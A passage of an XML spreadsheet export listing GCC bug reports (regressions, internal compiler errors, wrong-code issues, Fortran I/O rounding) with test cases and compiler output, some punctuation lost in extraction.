The testcase is a regression although the issue preexisted.</t>
  </si>
  <si>
    <t>GCC-27440</t>
  </si>
  <si>
    <t>[4.4 regression] code quality regression due to ivopts</t>
  </si>
  <si>
    <t>Compiling this code with 3.4.6
void fill2 (unsigned int *arr  unsigned int val unsigned int start unsigned int limit)
{
  unsigned int i
  for (i = start i &lt; start + limit i++)
    arr[i] = val
}
generates: 
.L10:
        movl    %ecx (%ebx%eax4)
        incl    %eax
.L8:
        cmpl    %eax %edx
        ja      .L10
4.0/4.1/4.2 -O2 generate:
.L4:
        incl    %edx
        movl    %esi (%eax)
        addl    $4 %eax
        cmpl    %ecx %edx
        jne     .L4
which is both slower and bigger. 
using -O2 -fno-ivopts the result is much better:
.L4:
        movl    %ecx (%ebx%eax4)
        incl    %eax
        cmpl    %edx %eax
        jb      .L4
The difference in the .final_cleanup dump with and without ivopts is obvious:
With ivopts: 
  void * ivtmp.29
  unsigned int ivtmp.26
  unsigned int D.1290
:
  D.1290 = start + limit
  if (start  else goto 
:
  ivtmp.29 = arr + (unsigned int *) (start * 4)
  ivtmp.26 = 0
:
  MEM[base: (unsigned int *) ivtmp.29] = val
  ivtmp.26 = ivtmp.26 + 1
  ivtmp.29 = ivtmp.29 + 4B
  if (ivtmp.26 != D.1290 - start) goto  else goto 
:
  return
Without ivopts:
  unsigned int i
  unsigned int D.1290
:
  D.1290 = start + limit
  if (start  else goto 
:
  i = start
:
  *((unsigned int *) (i * 4) + arr) = val
  i = i + 1
  if (i  else goto 
:
  return
The   void * ivtmp.29 is created by the ivopts pass. Why is it
a void* when it is known to be assigned to a unsigned int* ? 
Note that loops like the one in this example are quite common. For example in the assembly for PR8361 there are about 37 fill functions with very similar code (they are intantiations of 2 different templates but still...)</t>
  </si>
  <si>
    <t>GCC-78495</t>
  </si>
  <si>
    <t>[7 regression][new inheriting ctors] invisible-ref parm has address taken</t>
  </si>
  <si>
    <t>I noticed an std::unique_ptr destructor was being called on a bogus
pointer in an own::optional&gt; testcase of mine (not
std::optional/libstdc++-related). I managed to reduce to a minimal test and in the debugger it looks like when the inherited constructor is entered the val parameter contains garbage. Then upon leaving the constructor the
destructor for the parameter is run on that garbage.
Whatever the exact rundown of events the regression is that the program used
to return 0 whereas it returns 1 now. The change in behaviour appeared with
r241765. From then on compiling the testcase with -fnew-inheriting-ctors
gives the new behaviour while -fno-new-inheriting-ctors gives the old for both
-std=c++1z and -std=c++14.
//----------
int counter = 0
struct canary {
    canary() {}
    bool active = false
    canary(canary const
    canary(canary }
    ~canary()
    { if(active) ++counter }
}
struct optional_base {
    union {
        unsigned char empty {}
        canary val
    }
    bool active = false
    optional_base(canary val)
        : val(static_cast(val))
         active(true)
    {}
    ~optional_base()
    {
        if(active) {
            val.~canary()
        }
    }
}
struct optional: optional_base {
    using optional_base::optional_base
}
int main()
{
    {
        // N.B. inactive from the start
        canary c
        //assert( !c.active )
        optional o(static_cast&lt;canary
        //assert( !c.active )
        // may fire if -O level above 0
        //assert( !o.val.active )
    }
    return counter
}</t>
  </si>
  <si>
    <t>GCC-497</t>
  </si>
  <si>
    <t>[i386-&gt;M*Core] gcc generates wrong code for Motorola M*Core</t>
  </si>
  <si>
    <t>The function exit time gcc forgets to pull M*Core registers
off the stack and adjust the stack pointer.  It seems this
happens when optimization is enabled AND the function has
several exit points (return statements).
A more detailed description with code snippets is included.
Release:
gcc version 2.96 20000814 (experimental)
Environment:
NetBSD 1.4.2/i386 cross-gcc for Motorola M*Core CPU
How-To-Repeat:
Compile the sample functions.</t>
  </si>
  <si>
    <t>jmarin</t>
  </si>
  <si>
    <t>GCC-57331</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: tree check: expected integer_type or enumeral_type or boolean_type or real_type or fixed_point_type have pointer_type in int_fits_type_p at tree.c:8437</t>
  </si>
  <si>
    <t>r199075 FAIL
$ cat x.i
int J_0
int a
static void * foo(int * x)
{
  for( 0&lt;a J_0++)
    return (void*)1
  return 0
}
long b = 0
int c
int bar(void)
{
  b = (long) foo(
  if(b)
    return 0
}
]$ gcc -fpreprocessed -O3 -c x.i
x.i: In function 'bar':
x.i:12:5: internal compiler error: tree check: expected integer_type or enumeral_type or boolean_type or real_type or fixed_point_type have pointer_type in int_fits_type_p at tree.c:8437
 int bar(void)
     ^
0xc0ee0a tree_check_failed(tree_node const* char const* int char const* ...)
	/home/dimhen/src/gcc_current/gcc/tree.c:9059
0xc15d0c tree_check5
	/home/dimhen/src/gcc_current/gcc/tree.h:3991
0xc15d0c int_fits_type_p(tree_node const* tree_node const*)
	/home/dimhen/src/gcc_current/gcc/tree.c:8437
0xbff35c simplify_cond_using_ranges
	/home/dimhen/src/gcc_current/gcc/tree-vrp.c:8672
0xbff35c simplify_stmt_using_ranges
	/home/dimhen/src/gcc_current/gcc/tree-vrp.c:8993
0xbff35c vrp_fold_stmt
	/home/dimhen/src/gcc_current/gcc/tree-vrp.c:9069
0xb5b867 substitute_and_fold(tree_node* (*)(tree_node*) bool (*)(gimple_stmt_iterator_d*) bool)
	/home/dimhen/src/gcc_current/gcc/tree-ssa-propagate.c:1162
0xc0c294 vrp_finalize
	/home/dimhen/src/gcc_current/gcc/tree-vrp.c:9241
0xc0c294 execute_vrp
	/home/dimhen/src/gcc_current/gcc/tree-vrp.c:9337
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-12292</t>
  </si>
  <si>
    <t>internal compiler error: RTL check: expected code `const_int' have `reg' in make_field_assignment at combine.c:7815</t>
  </si>
  <si>
    <t>gcc 3.3.1 internal compiler error on the following short test case.
% gcc -c bug.c -O
bug.c: In function `bug':
bug.c:35: internal compiler error: RTL check: expected code `const_int' have
`reg' in make_field_assignment at combine.c:7815
--- bug.c ---
typedef struct {
	char flags
} rec
extern char vec[10]
int bug(rec *c)
{
	char *p = 0
	int v t f
	for () {
		switch (*p++) {
		case 0:
			t = *p++
			f = *p++
			v = vec[*p++]
			if (v == 1) {
				if (f)
					c-&gt;flags |= (1 &lt;&lt; t)
			} else {
				if (!f)
					c-&gt;flags 
			}
			break
		case 1:
			v = vec[*p++]
			break
		case 2:
			((void) ((p == 0) ? 0 : (__assert_fail (p == 0 bug.c 31
__PRETTY_FUNCTION__) 0)))
			break
		}
	}
	return 0
}
--- end bug.c ---
gcc build configuration:
configure --prefix=/usr/local --host=x86_64-suse-linux-gnu --disable-nls
--enable-threads=posix --enable-clocale=gnu --enable-__cxa_atexit
--enable-shared --enable-languages=cc++f77objctreelangjavaf77
--enable-checking=misctreertlgcrtlflag --with-system-zlib</t>
  </si>
  <si>
    <t>GCC-66619</t>
  </si>
  <si>
    <t>Internal compiler error: variable template deduced by template argument deduction</t>
  </si>
  <si>
    <t>This bug is two-fold. GCC trunk gives an ICE when val is instantiated with an lvalue reference:
int y
template
T val = y
int main() {
    auto
}
######################################################
prog.cc: In function 'int main()':
prog.cc:7:16: internal compiler error: in convert_like_real at cp/call.c:6485
     auto
                ^
0x5a8cd6 convert_like_real
	/home/heads/gcc/gcc-source/gcc/cp/call.c:6485
0x5b15a1 initialize_reference(tree_node* tree_node* int int)
	/home/heads/gcc/gcc-source/gcc/cp/call.c:9732
0x5b9188 grok_reference_init
	/home/heads/gcc/gcc-source/gcc/cp/decl.c:5008
0x5b9188 check_initializer
	/home/heads/gcc/gcc-source/gcc/cp/decl.c:5900
0x5ce24c cp_finish_decl(tree_node* tree_node* bool tree_node* int)
	/home/heads/gcc/gcc-source/gcc/cp/decl.c:6619
0x646978 cp_parser_init_declarator
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:17316
0x648763 cp_parser_simple_declaration
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11608
0x62b2c3 cp_parser_block_declaration
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11482
0x62bdd1 cp_parser_declaration_statement
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11109
0x62cb0a cp_parser_statement
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:9810
0x62d142 cp_parser_statement_seq_opt
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:10088
0x62d273 cp_parser_compound_statement
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:10042
0x64538b cp_parser_function_body
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:19221
0x64538b cp_parser_ctor_initializer_opt_and_function_body
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:19257
0x645eb0 cp_parser_function_definition_after_declarator
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:23517
0x646d5e cp_parser_function_definition_from_specifiers_and_declarator
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:23429
0x646d5e cp_parser_init_declarator
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:17089
0x648763 cp_parser_simple_declaration
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11608
0x62b2c3 cp_parser_block_declaration
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11482
0x625425 cp_parser_declaration
	/home/heads/gcc/gcc-source/gcc/cp/parser.c:11379
######################################################
This second example gives an error that doesn't make sense. Instantiate val with an rvalue reference:
template
T val = 0
int main() {
    auto
}
prog.cc: In function 'int main()':
prog.cc:7:16: error: cannot bind 'int&amp;&amp;' lvalue to 'int&amp;&amp;'
     auto
######################################################
Using built-in specs.
COLLECT_GCC=/usr/local/gcc-head/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/gcc-head/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/heads/gcc/gcc-source/configure --prefix=/usr/local/gcc-head --enable-languages=cc++ --enable-lto --disable-multilib --without-ppl --without-cloog-ppl --enable-checking=release --disable-nls
Thread model: posix
gcc version 6.0.0 20150621 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-o' 'prog.exe' '-std=gnu++1z' '-I' '/usr/local/sprout' '-I' '/usr/local/boost-1.58.0/include' '-L/usr/local/boost-1.58.0/lib' '-Wall' '-Wextra' '-v' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/gcc-head/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/cc1plus -quiet -v -I /usr/local/sprout -I /usr/local/boost-1.58.0/include -imultiarch x86_64-linux-gnu -D_GNU_SOURCE prog.cc -quiet -dumpbase prog.cc -mtune=generic -march=x86-64 -auxbase prog -Wall -Wextra -std=gnu++1z -version -o /tmp/cc38EvaY.s
GNU C++14 (GCC) version 6.0.0 20150621 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 6.0.0 20150621 (experimental) GMP version 5.1.2 MPFR version 3.1.2 MPC version 1.0.1</t>
  </si>
  <si>
    <t>david.godfrey99</t>
  </si>
  <si>
    <t>GCC-38076</t>
  </si>
  <si>
    <t>FAIL: g++.dg/other/anon5.C</t>
  </si>
  <si>
    <t>In 32 bit mode the failure is:
/var/tmp//ccPCZsXJ.s:44:non-relocatable subtraction expression __ZN12_GLOBAL__N_11c1tE minus L00000000001$pb
/var/tmp//ccPCZsXJ.s:44:symbol: __ZN12_GLOBAL__N_11c1tE can't be undefined in a subtraction expression
In 64 bit mode the failure is 
Undefined symbols:
  (anonymous namespace)::c::t referenced from:
      f()    in ccUXilTp.o
ld: symbol(s) not found
collect2: ld returned 1 exit status
and would probably require the same fix as for *-*-hpux* *-*-solaris2.* (see pr35245).</t>
  </si>
  <si>
    <t>GCC-45013</t>
  </si>
  <si>
    <t>[4.6 regression] Failed to build 483.xalancbmk in SPEC CPU 2006</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 162344 gave:
[hjl@gnu-27 build_base_o3.0000]$ /export/gnu/import/svn/gcc-test/usr/bin/g++  -DSPEC_CPU -DNDEBUG  -DAPP_NO_THREADS -DXALAN_INMEM_MSG_LOADER -I. -Ixercesc -Ixercesc/dom -Ixercesc/dom/impl -Ixercesc/sax -Ixercesc/util/MsgLoaders/InMemory -Ixercesc/util/Transcoders/Iconv -Ixalanc/include -DPROJ_XMLPARSER -DPROJ_XMLUTIL -DPROJ_PARSERS -DPROJ_SAX4C -DPROJ_SAX2 -DPROJ_DOM -DPROJ_VALIDATORS -DXML_USE_NATIVE_TRANSCODER -DXML_USE_INMEM_MESSAGELOADER  -O3 -ffast-math -funroll-loops   -DSPEC_CPU_LP64  -DSPEC_CPU_LINUX     StylesheetExecutionContextDefault.cpp StylesheetExecutionContextDefault.cpp: In constructor \u2018xalanc_1_8::StylesheetExecutionContextDefault::StylesheetExecutionContextDefault(xalanc_1_8::XalanNode* const xalanc_1_8::NodeRefListBase* const xalanc_1_8::PrefixResolver*)\u2019:
StylesheetExecutionContextDefault.cpp:147:1: internal compiler error: tree check: expected field_decl have type_decl in gimple_types_compatible_p at gimple.c:3673
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-27 build_base_o3.0000]$ 
Revision 162322 is OK.</t>
  </si>
  <si>
    <t>GCC-35983</t>
  </si>
  <si>
    <t>C_LOC in derived type constructor gives weird result</t>
  </si>
  <si>
    <t>$ cat a.f90 
program main
   use ISO_C_BINDING
   implicit none
   type bind(C) :: descr
      type(C_PTR) :: address
   end type descr
   type(descr) :: DD
   double precision target :: buf(1)
   buf = (/ 0 /)
   DD = descr(c_loc(buf))
   print * transfer(DD%address 0_c_intptr_t) &amp;
     transfer(c_loc (buf) 0_c_intptr_t)
end program main
$ gfortran a.f90 &amp;&amp; ./a.out
           0 -1073744200</t>
  </si>
  <si>
    <t>GCC-6213</t>
  </si>
  <si>
    <t xml:space="preserve"> On Sat Apr 06 2002 at 02:48:54PM -0800 Mark Mitchell wrote:
 &gt; I think this is the most practical solution under the circumstances.
 Hold off a bit.  I don't think either of the solutions
 that Jason suggests are hard to implement.  I'd certainly
 prefer a solution that doesn't re-introduce bugs...
 r~
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-7166</t>
  </si>
  <si>
    <t>Non-type template instantiation fails for pointer types</t>
  </si>
  <si>
    <t>Instantiating a template with a non-type parameter of pointer type makes the compiler complain about the parameter not being an object with external linkage. So far I've only tried with char* and int*. It works for char[] and int[].
See test case below.
Release:
gcc 3.1
Environment:
d:/Des/cppExp # gcc -v
Reading specs from t:/msys/1.0/mingw/bin/../lib/gcc-lib/mingw32/3.1/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable-languages=f77c++objcada --disable-win32-registry --disable-shared
Thread model: win32
gcc version 3.1
It fails too with gcc 3.1 (cygwin) and gcc 2.95.3-6 (MinGW)
How-To-Repeat:
Compiling this:
/// begin
template  class FooChar {}
char *strPointer = Hi!
char  strArray[] = Hi!
template  class FooInt {}
int *intPointer = 0
int  intArray[] = { 1 2 }
int main() {
  FooChar fooCharPointer
  FooChar fooCharArray
  FooInt fooIntPointer
  FooInt fooIntArray
}
/// end
produces
g++ -c gccbugTPointer.cpp
gccbugTPointer.cpp: In function `int main()':
gccbugTPointer.cpp:12: `strPointer' is not a valid template argument
gccbugTPointer.cpp:12: it must be the address of an object with external linkage
gccbugTPointer.cpp:12: ISO C++ forbids declaration of `fooPointer' with no type
gccbugTPointer.cpp:15: `intPointer' is not a valid template argument
gccbugTPointer.cpp:15: it must be the address of an object with external linkage
gccbugTPointer.cpp:15: ISO C++ forbids declaration of `fooIntPointer' with no type</t>
  </si>
  <si>
    <t>ofv</t>
  </si>
  <si>
    <t>GCC-48615</t>
  </si>
  <si>
    <t>Invalid UP/DOWN rounding with E and ES descriptors</t>
  </si>
  <si>
    <t>The E and ES descriptors ignore the I/O rounding mode:
print (RUF17.0) 1.1
print (RUG17.1) 1.1e9
print (RUE17.1) 1.1e9 ! 0.1E+10 expected 0.2E+10
print (RUES17.0) 1.1e9  ! 1.E+09 expected 2.E+09
print (RUEN17.0) 1.1e9
print (RDF17.0) 1.9
print (RDG17.1) 1.9e9
print (RDE17.1) 1.9e9   ! 0.2E+10 expected 0.1E+10
print (RDES17.0) 1.9e9  ! 2.E+09 expected 1.E+09
print (RDEN17.0) 1.9e9
end
Fortran 2008:
10.7.2.3.3 E and D editing
4 ...
- x1 x2 ... xd are the d most significant digits of the internal value after rounding (10.7.2.3.7)
10.7.2.3.5 ES editing
5 ...
- y is a decimal digit representative of the most significant digit of the internal value after rounding (10.7.2.3.7)
- signiï¬es a decimal symbol (10.6)
- x1 x2 ... xd are the d next most significant digits of the internal value after rounding
10.7.2.3.7 I/O rounding mode
3 When the I/O rounding mode is UP the value resulting from conversion shall be the smallest representable value that is greater than or equal to the original value. When the I/O rounding mode is DOWN the value resulting
from conversion shall be the largest representable value that is less than or equal to the original value.</t>
  </si>
  <si>
    <t>GCC-19115</t>
  </si>
  <si>
    <t>long double should be changed over to 128bit by default</t>
  </si>
  <si>
    <t>The attached test generates the following output:
i=-803365344
i=1
Both __builtin_frexpl and std::frexp(long double) give the above incorrect output.
However ::frexpl works as expected.</t>
  </si>
  <si>
    <t>GCC-80830</t>
  </si>
  <si>
    <t>[8 Regression] ICE in tsubst_copy at cp/pt.c:14569</t>
  </si>
  <si>
    <t>Created attachment 41390
gzipped C++ source code
The attached C++ code when compiled by recent gcc trunk does this:
../results.248178/bin/gcc
../results.248260/bin/gcc
/usr/include/wfmath-1.0/wfmath/ball.h:75:24: internal compiler error: in tsubst_copy at cp/pt.c:14569
$
So the bug seems to exist between revisions 248178 and 248260.
I'll have a go at reducing the code.</t>
  </si>
  <si>
    <t>GCC-35227</t>
  </si>
  <si>
    <t>[4.2 regression] gcc ICEs for functions with unused complex argument</t>
  </si>
  <si>
    <t>on an x86_64/x86 system a simple mandel code base crashes gcc-4.1.2 and newer:
$ gcc -c mandel.i -O1
mandel.i: In function 'mandel':
mandel.i:5: warning: incompatible implicit declaration of built-in function 'cabs'
mandel.i:2: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc4gdEy7.out file please attach this to your bugreport.
gcc-4.0.4 seems to work but anything newer bombs</t>
  </si>
  <si>
    <t>GCC-46592</t>
  </si>
  <si>
    <t>-ftree-parallelize-loops attempts to link pthreads on non-posix systems</t>
  </si>
  <si>
    <t>*-elf toolchains are failing the -ftree-parallelize-loops test pr46111 because using that option unconditionally attempts to link pthreads.  I suppose I could define GOMP_SELF_SPECS to  for my target but why isn't pthreads only linked in with libgomp is linked?</t>
  </si>
  <si>
    <t>GCC-41255</t>
  </si>
  <si>
    <t>[4.5 Regression] Release notes: Advice to use GDB later than 6.8</t>
  </si>
  <si>
    <t>[One] need[s] the upcoming GDB to debug GCC 4.5 compiled code anyway because older GDBs mishandle DW_CFA_restore_state which is now used all around in .eh_frame otherwise backtraces really don't work.  [1]
Thus one should document this in the GCC 4.5 release notes.
GDB 7.0 will support this for GDB 6.8 one can use the patches at [2].
[1] http://gcc.gnu.org/ml/gcc-patches/2009-09/msg00335.html
[2] http://gcc.gnu.org/ml/gcc-patches/2009-09/msg00074.html</t>
  </si>
  <si>
    <t>GCC-69669</t>
  </si>
  <si>
    <t>[5 Regression] ICE with enum __attribute__((mode(QI)))</t>
  </si>
  <si>
    <t>Created attachment 37576
reduced test case
Hi
the attached program gives ICE with gcc-6 trunk:
gcc -O2 small.c
small.c: In function 'OpcUa_UpdateDataDetails_Decode':
small.c:21:18: internal compiler error: in decompose at wide-int.h:897
 OpcUa_StatusCode OpcUa_UpdateDataDetails_Decode(
                  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0xd5c99e wi::int_traits &gt; &gt;::decompose(long* unsigned int generic_wide_int &gt; const&amp;)
	../../gcc-6-20160131/gcc/wide-int.h:897
0xd5c99e wide_int_ref_storage::wide_int_ref_storage &gt; &gt;(generic_wide_int &gt; const&amp; unsigned int)
	../../gcc-6-20160131/gcc/wide-int.h:945
0xd5c99e generic_wide_int &gt;::generic_wide_int &gt; &gt;(generic_wide_int &gt; const&amp; unsigned int)
	../../gcc-6-20160131/gcc/wide-int.h:722
0xd5c99e trailing_wide_int_storage&amp; trailing_wide_int_storage::operator= &gt; &gt;(generic_wide_int &gt; const&amp;)
	../../gcc-6-20160131/gcc/wide-int.h:1345
0xd5c99e generic_wide_int&amp; generic_wide_int::operator= &gt; &gt;(generic_wide_int &gt; const&amp;)
	../../gcc-6-20160131/gcc/wide-int.h:850
0xd5c99e void range_info_def::set_min &gt; &gt;(generic_wide_int &gt; const&amp;)
	../../gcc-6-20160131/gcc/tree-ssanames.h:52
0xd5c99e set_range_info(tree_node* value_range_type generic_wide_int &gt; const&amp; generic_wide_int &gt; const&amp;)
	../../gcc-6-20160131/gcc/tree-ssanames.c:341
0xdcbbf3 vrp_finalize
	../../gcc-6-20160131/gcc/tree-vrp.c:10250
0xdcbbf3 execute_vrp
	../../gcc-6-20160131/gcc/tree-vrp.c:10350
0xdcbbf3 execute
	../../gcc-6-20160131/gcc/tree-vrp.c:10435
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-79768</t>
  </si>
  <si>
    <t>`-Wmaybe-uninitialized' false positive with optimisation</t>
  </si>
  <si>
    <t>The following source file (here called `gcc_bug.c') triggers `-Wmaybe-uninitialized' when compiled with `-Os' `-O1' or stronger optimisation plus `-Wall':
------------------------------------------------------------------------
#include 
#include 
static int mk (int **a int **b int **c) {
	if (!(*a = malloc (sizeof (int)))) goto a_err
	if (!(*b = malloc (sizeof (int)))) goto b_err
	if (!(*c = malloc (sizeof (int)))) goto c_err
	return 1 c_err:
	free (*b) b_err:
	free (*a) a_err:
	return 0
}
static void fin (int *a int *b int *c) {
	free (c)
	free (b)
	free (a)
}
int main (void) {
	int *a *b *c x flag = mk (
	while ((x = getchar ()) != -1) {
		if (flag) switch (x) {
		case 0:
			break
		default:
			goto retn
		} else if (x) goto retn
	}
	retn:
	if (flag) fin (a b c)
	return 0
}
------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>caspervector</t>
  </si>
  <si>
    <t>GCC-38494</t>
  </si>
  <si>
    <t>[graphite] Bootstrap fails with graphite enabled</t>
  </si>
  <si>
    <t>Bootstrap is broken with BOOT_CFLAGS=-g -O2 -fgraphite-identity.</t>
  </si>
  <si>
    <t>GCC-30879</t>
  </si>
  <si>
    <t>[4.2/4.1 only] Syntax error for derived type's compounds in a data-stmt-value-set</t>
  </si>
  <si>
    <t>With recent trunk gfortran incorrectly generates an error for the following standard code:
  TYPE T1
   INTEGER :: I
  END TYPE T1
  TYPE(T1) PARAMETER :: D1=T1(2)
  INTEGER :: a(2)
  DATA (a(i)i=1D1%I) /D1%I*D1%I/
  END</t>
  </si>
  <si>
    <t>GCC-1862</t>
  </si>
  <si>
    <t>Segmentation fault caused by compiler generated exit code</t>
  </si>
  <si>
    <t>An extremely simple code (just a few simple lines) crashes
in the compiler generated global destructor code:
core file = /export/home/khuang/core -- program ``a.out'' on platform SUNWUltra
-5_10
SIGSEGV: Segmentation Fault
__do_global_dtors_aux(ff29b22cff2870a01b41ff3e0000ff3e1e78) + 38
__do_global_ctors_aux(ff33bfb8ff33bf902121dc0ff29b2a0) + 60
There was no compilation error or warning (-Wall)
Release:
/usr/local/lib/gcc-lib/sparc-sun-solaris2.8/2.95.2/specs gcc version 2.95.2 19991024 (release)
Environment:
Sun Ultra 5 running Solaris 8.  gcc binary installed 
using pkgadd without error
How-To-Repeat:
run a.out</t>
  </si>
  <si>
    <t>khuang</t>
  </si>
  <si>
    <t>GCC-5637</t>
  </si>
  <si>
    <t>gcc/c++ won't internal error when compiling POSE (PalmOS Emulator)</t>
  </si>
  <si>
    <t>compiler output is such after which it quits:
./../SrcShared/MetaMemory.cpp: In function `static enum Errors::EAccessType MetaMemory::AllowForBugs(long unsigned int long int int Errors::EAccessType)':
./../SrcShared/MetaMemory.cpp:428: Internal compiler error.
./../SrcShared/MetaMemory.cpp:428: Please submit a full bug report.
./../SrcShared/MetaMemory.cpp:428: See  for instructions.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
Linux 2.4.16 SMP i686
How-To-Repeat:
not sure what to include in addition to the above .ii file so here's the command line that generates the error.</t>
  </si>
  <si>
    <t>voils</t>
  </si>
  <si>
    <t>GCC-60173</t>
  </si>
  <si>
    <t>[4.9 Regression]: gcc.dg/binop-xor1.c scan-tree-dump-times</t>
  </si>
  <si>
    <t>This test previously passed now it fails.
A patch in the revision range (last_known_working:first_known_failing) 207658:207668 exposed or caused this regression.  Since then it fails as follows:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/dg.exp ...
FAIL: gcc.dg/binop-xor1.c scan-tree-dump-times optimized \\^ 1
This test also fails for at least the following targets (revision link to gcc-testresults@)
powerpc64-unknown-linux-gnu (207741
) m68k-unknown-linux-gnu (unknown )
s390x-ibm-linux-gnu (207735 ) powerpc-ibm-aix7.1.0.0 (207693 ) 
(The failure is not universal it seems to not fail for at least as many other targets.)
Author of the single suspect patch CC:ed.</t>
  </si>
  <si>
    <t>GCC-16952</t>
  </si>
  <si>
    <t>GCC for powerpc cross target with -mrelocatable reports error</t>
  </si>
  <si>
    <t>Get the following errors when cross compiling with GCC 3.4.0
for powerpc target. Same compilation goes clean with GCC 3.3.2
for powerpc target.
{standard input}: Assembler messages:
{standard input}:31: Error: Relocation cannot be done when using -mrelocatable
{standard input}:32: Error: Relocation cannot be done when using -mrelocatable
{standard input}:33: Error: Relocation cannot be done when using -mrelocatable
{standard input}:34: Error: Relocation cannot be done when using -mrelocatable
{standard input}:35: Error: Relocation cannot be done when using -mrelocatable
{standard input}:36: Error: Relocation cannot be done when using -mrelocatable
{standard input}:37: Error: Relocation cannot be done when using -mrelocatable
{standard input}:38: Error: Relocation cannot be done when using -mrelocatable
{standard input}:49: Error: Relocation cannot be done when using -mrelocatable
Here's more info:
&gt; /home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-405-linux-gnu/gcc-
3.4.0-glibc-2.3.2/bin/powerpc-405-linux-gnu-gcc -v
/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-405-linux-gnu/gcc-
3.4.0-glibc-2.3.2/bin/powerpc-405-linux-gnu-gcc -v
Reading specs from /home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-
405-linux-gnu/gcc-3.4.0-glibc-2.3.2/bin/../lib/gcc/powerpc-405-linux-
gnu/3.4.0/specs
Configured 
with: /home/jbirnbaum/jbirnbaum_view3/fabt_infosec_spci/src/plat/crosstool/cross
tool/build/powerpc-405-linux-gnu/gcc-3.4.0-glibc-2.3.2/gcc-3.4.0/configure --
target=powerpc-405-linux-gnu --host=i686-host_pc-linux-gnu --
prefix=/home/jbirnbaum/jbirnbaum_view3/fabt_infosec_spci/pkg/powerpc-405-linux-
gnu/gcc-3.4.0-glibc-2.3.2 --with-cpu=405 --enable-cxx-flags=-mcpu=405 --with-
headers=/home/jbirnbaum/jbirnbaum_view3/fabt_infosec_spci/pkg/powerpc-405-linux-
gnu/gcc-3.4.0-glibc-2.3.2/powerpc-405-linux-gnu/include --with-local-
prefix=/home/jbirnbaum/jbirnbaum_view3/fabt_infosec_spci/pkg/powerpc-405-linux-
gnu/gcc-3.4.0-glibc-2.3.2/powerpc-405-linux-gnu --disable-nls --enable-
threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-
languages=cc++ --enable-shared --enable-c99 --enable-long-long
Thread model: posix
gcc version 3.4.0
/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-405-linux-gnu/gcc-
3.4.0-glibc-2.3.2/bin/powerpc-405-linux-gnu-as -v
/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-405-linux-gnu/gcc-
3.4.0-glibc-2.3.2/bin/powerpc-405-linux-gnu-as -v
GNU assembler version 2.15 (powerpc-405-linux-gnu) using BFD version 2.15
Toolchain built using Crosstools-0.27
Attempting to compile: zlib.c
&gt; /home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/pkg/powerpc-405-linux-gnu/gcc-
3.4.0-glibc-2.3.2/bin/powerpc-405-linux-gnu-gcc -Os  -ffixed-r14 -meabi -
mrelocatable -D__KERNEL__ -DTEXT_BASE=0xFFFA0000 -
I/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/bootloader/include -
fno-builtin -pipe -DCONFIG_PPC -D__powerpc__ -DDEBUG -DCONFIG_4xx -ffixed-r2 -
ffixed-r29 -mcpu=405 -msoft-float -mstring -Wa-m405 -Wall -Wstrict-prototypes -
c zlib.c -o zlib.o
{standard input}: Assembler messages:
{standard input}:31: Error: Relocation cannot be done when using -mrelocatable
{standard input}:32: Error: Relocation cannot be done when using -mrelocatable
{standard input}:33: Error: Relocation cannot be done when using -mrelocatable
{standard input}:34: Error: Relocation cannot be done when using -mrelocatable
{standard input}:35: Error: Relocation cannot be done when using -mrelocatable
{standard input}:36: Error: Relocation cannot be done when using -mrelocatable
{standard input}:37: Error: Relocation cannot be done when using -mrelocatable
{standard input}:38: Error: Relocation cannot be done when using -mrelocatable
{standard input}:49: Error: Relocation cannot be done when using -mrelocatable
Below is the compiler's generated .s file.
Note that cross compilation with powerpc GCC 3.3.2 is successful
(tool versions shown next). If -mrelocatable is removed cross 
compilation is successful with GCC 3.4.0 but of course not what
is needed.
/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/result/powerp
c-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/bin/powerpc-405-linux-gnu-gcc -v
Reading specs 
from /home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/result/p
